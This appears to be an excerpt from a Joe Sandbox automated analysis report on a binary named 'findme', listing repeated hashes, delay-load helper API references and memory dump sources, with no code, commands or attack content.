                    • Opcode ID: b56a73ef2448602c1fbc9ac95fd018a98f87a3dad966f6a338adc43f0b77789c
                    • Instruction ID: d4164b4ff19dfbdfb1e8fe8695f3d77c2066cec992a66051709352062259ec60
                    • Opcode Fuzzy Hash: b56a73ef2448602c1fbc9ac95fd018a98f87a3dad966f6a338adc43f0b77789c
                    • Instruction Fuzzy Hash: 44A012D196C0027C30093201EC26D36021CC4C2B14330440FB006901C094482805143E
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DD8A3
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: ba8a4211581413898bc2534179ee786a9f8e6ab8791713b1b871ab4ac08c9b53
                    • Instruction ID: d4164b4ff19dfbdfb1e8fe8695f3d77c2066cec992a66051709352062259ec60
                    • Opcode Fuzzy Hash: ba8a4211581413898bc2534179ee786a9f8e6ab8791713b1b871ab4ac08c9b53
                    • Instruction Fuzzy Hash: 44A012D196C0027C30093201EC26D36021CC4C2B14330440FB006901C094482805143E
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DD8A3
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: e273bf536a5b046ec9f6b28bcd4a9327255f1664e327b49ddaeb56801e073e07
                    • Instruction ID: d4164b4ff19dfbdfb1e8fe8695f3d77c2066cec992a66051709352062259ec60
                    • Opcode Fuzzy Hash: e273bf536a5b046ec9f6b28bcd4a9327255f1664e327b49ddaeb56801e073e07
                    • Instruction Fuzzy Hash: 44A012D196C0027C30093201EC26D36021CC4C2B14330440FB006901C094482805143E
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DD8A3
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: f69fce2507b41a41ec3bbfd3b1041eb132d28c45644fd31b745b69f41f553ca3
                    • Instruction ID: d4164b4ff19dfbdfb1e8fe8695f3d77c2066cec992a66051709352062259ec60
                    • Opcode Fuzzy Hash: f69fce2507b41a41ec3bbfd3b1041eb132d28c45644fd31b745b69f41f553ca3
                    • Instruction Fuzzy Hash: 44A012D196C0027C30093201EC26D36021CC4C2B14330440FB006901C094482805143E
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DD8A3
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 2cb26e7498c8f31f0c7928a62737cdb764f4cde626527df40fc4edba5059ce93
                    • Instruction ID: d4164b4ff19dfbdfb1e8fe8695f3d77c2066cec992a66051709352062259ec60
                    • Opcode Fuzzy Hash: 2cb26e7498c8f31f0c7928a62737cdb764f4cde626527df40fc4edba5059ce93
                    • Instruction Fuzzy Hash: 44A012D196C0027C30093201EC26D36021CC4C2B14330440FB006901C094482805143E
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DD8A3
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: c5533f927777f0fb2ea7702f9cb40c8a2bd4cbde8a22881a0e7e65f158e84026
                    • Instruction ID: d4164b4ff19dfbdfb1e8fe8695f3d77c2066cec992a66051709352062259ec60
                    • Opcode Fuzzy Hash: c5533f927777f0fb2ea7702f9cb40c8a2bd4cbde8a22881a0e7e65f158e84026
                    • Instruction Fuzzy Hash: 44A012D196C0027C30093201EC26D36021CC4C2B14330440FB006901C094482805143E
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DD8A3
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: e1e3af30139cc9b21d58eb340634c6c7ec312b9d50a007a45bc036616ec2e25b
                    • Instruction ID: d4164b4ff19dfbdfb1e8fe8695f3d77c2066cec992a66051709352062259ec60
                    • Opcode Fuzzy Hash: e1e3af30139cc9b21d58eb340634c6c7ec312b9d50a007a45bc036616ec2e25b
                    • Instruction Fuzzy Hash: 44A012D196C0027C30093201EC26D36021CC4C2B14330440FB006901C094482805143E
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DD8A3
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 88b2c13b5fc1809b7205de5900f38c4fc25febea969940fd98e79a5d7923568b
                    • Instruction ID: d4164b4ff19dfbdfb1e8fe8695f3d77c2066cec992a66051709352062259ec60
                    • Opcode Fuzzy Hash: 88b2c13b5fc1809b7205de5900f38c4fc25febea969940fd98e79a5d7923568b
                    • Instruction Fuzzy Hash: 44A012D196C0027C30093201EC26D36021CC4C2B14330440FB006901C094482805143E
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DD8A3
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 62d403f478e1e2bd86ab120f8f8e0d147606880319951333e043659bddaf0261
                    • Instruction ID: d4164b4ff19dfbdfb1e8fe8695f3d77c2066cec992a66051709352062259ec60
                    • Opcode Fuzzy Hash: 62d403f478e1e2bd86ab120f8f8e0d147606880319951333e043659bddaf0261
                    • Instruction Fuzzy Hash: 44A012D196C0027C30093201EC26D36021CC4C2B14330440FB006901C094482805143E
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DD8A3
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                     • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: f13790f063f02dc760baae51b2d94ed47997bd7bda08c67ac45704bd0b6ab507
                    • Instruction ID: d4164b4ff19dfbdfb1e8fe8695f3d77c2066cec992a66051709352062259ec60
                    • Opcode Fuzzy Hash: f13790f063f02dc760baae51b2d94ed47997bd7bda08c67ac45704bd0b6ab507
                    • Instruction Fuzzy Hash: 44A012D196C0027C30093201EC26D36021CC4C2B14330440FB006901C094482805143E
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DD8A3
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                     • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 6a38527ca7bee5c641de5a8c61d23e8d48c3b542ee1bdce1fc6c9e66c0eedce5
                    • Instruction ID: d4164b4ff19dfbdfb1e8fe8695f3d77c2066cec992a66051709352062259ec60
                    • Opcode Fuzzy Hash: 6a38527ca7bee5c641de5a8c61d23e8d48c3b542ee1bdce1fc6c9e66c0eedce5
                    • Instruction Fuzzy Hash: 44A012D196C0027C30093201EC26D36021CC4C2B14330440FB006901C094482805143E
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DDAB2
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                     • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 37e3b18b21ccdc0fe0595c4fe303f9f01c0fa39afc3b65a704a27a73984a5a5c
                    • Instruction ID: 63911c92570a1000fd5bb91756aaca505fb5f1c9123bfa1b69101230615beff1
                    • Opcode Fuzzy Hash: 37e3b18b21ccdc0fe0595c4fe303f9f01c0fa39afc3b65a704a27a73984a5a5c
                    • Instruction Fuzzy Hash: 6CA001A6AAD107BC31187252ED2AE7A026CC4C5B657309A1FB50A94289A98C584A587E
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DDAB2
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                     • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 68259779fdcaec0d598d020439d7947baf584ba55c43a126a029b1cfb6e26def
                    • Instruction ID: 63911c92570a1000fd5bb91756aaca505fb5f1c9123bfa1b69101230615beff1
                    • Opcode Fuzzy Hash: 68259779fdcaec0d598d020439d7947baf584ba55c43a126a029b1cfb6e26def
                    • Instruction Fuzzy Hash: 6CA001A6AAD107BC31187252ED2AE7A026CC4C5B657309A1FB50A94289A98C584A587E
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DDAB2
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                     • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 769fef2bf55169c4c5924916b502b017274e279b10035f7f40965c4331ec6099
                    • Instruction ID: 63911c92570a1000fd5bb91756aaca505fb5f1c9123bfa1b69101230615beff1
                    • Opcode Fuzzy Hash: 769fef2bf55169c4c5924916b502b017274e279b10035f7f40965c4331ec6099
                    • Instruction Fuzzy Hash: 6CA001A6AAD107BC31187252ED2AE7A026CC4C5B657309A1FB50A94289A98C584A587E
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DDAB2
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                     • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 0ed66114d00284e5034b660d16bfce03b8b354bdc6284874c388559f4d5c61f3
                    • Instruction ID: 63911c92570a1000fd5bb91756aaca505fb5f1c9123bfa1b69101230615beff1
                    • Opcode Fuzzy Hash: 0ed66114d00284e5034b660d16bfce03b8b354bdc6284874c388559f4d5c61f3
                    • Instruction Fuzzy Hash: 6CA001A6AAD107BC31187252ED2AE7A026CC4C5B657309A1FB50A94289A98C584A587E
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DDAB2
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                     • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: bec1696c4e0a7e3ba631b628862bca6392b6cc702ad79ed7afde4d0c8909e818
                    • Instruction ID: 63911c92570a1000fd5bb91756aaca505fb5f1c9123bfa1b69101230615beff1
                    • Opcode Fuzzy Hash: bec1696c4e0a7e3ba631b628862bca6392b6cc702ad79ed7afde4d0c8909e818
                    • Instruction Fuzzy Hash: 6CA001A6AAD107BC31187252ED2AE7A026CC4C5B657309A1FB50A94289A98C584A587E
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DDAB2
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                     • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 3b1f6173b4bc75f253cd01b8e809e34c53fa9e81ca6c7180c5dd57a19774f383
                    • Instruction ID: 7530a666a809beaf7a59d1e1586f1402b29a1fa6d5508af2f199146527d3c8a1
                    • Opcode Fuzzy Hash: 3b1f6173b4bc75f253cd01b8e809e34c53fa9e81ca6c7180c5dd57a19774f383
                    • Instruction Fuzzy Hash: F5A011A2AAC0023C3008B202EC2AE3A022CC0C0B22330820FB00AA0288A88C080A083E
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DDBD5
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                     • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: bda469f4dfb49036d978e708c1d3a3560a3afe67a32187cd752fd2c090821a9c
                    • Instruction ID: 570f39233ed7a99baa4b23c68198673bd71ea8b590e4a36cb5d51e37d488c03f
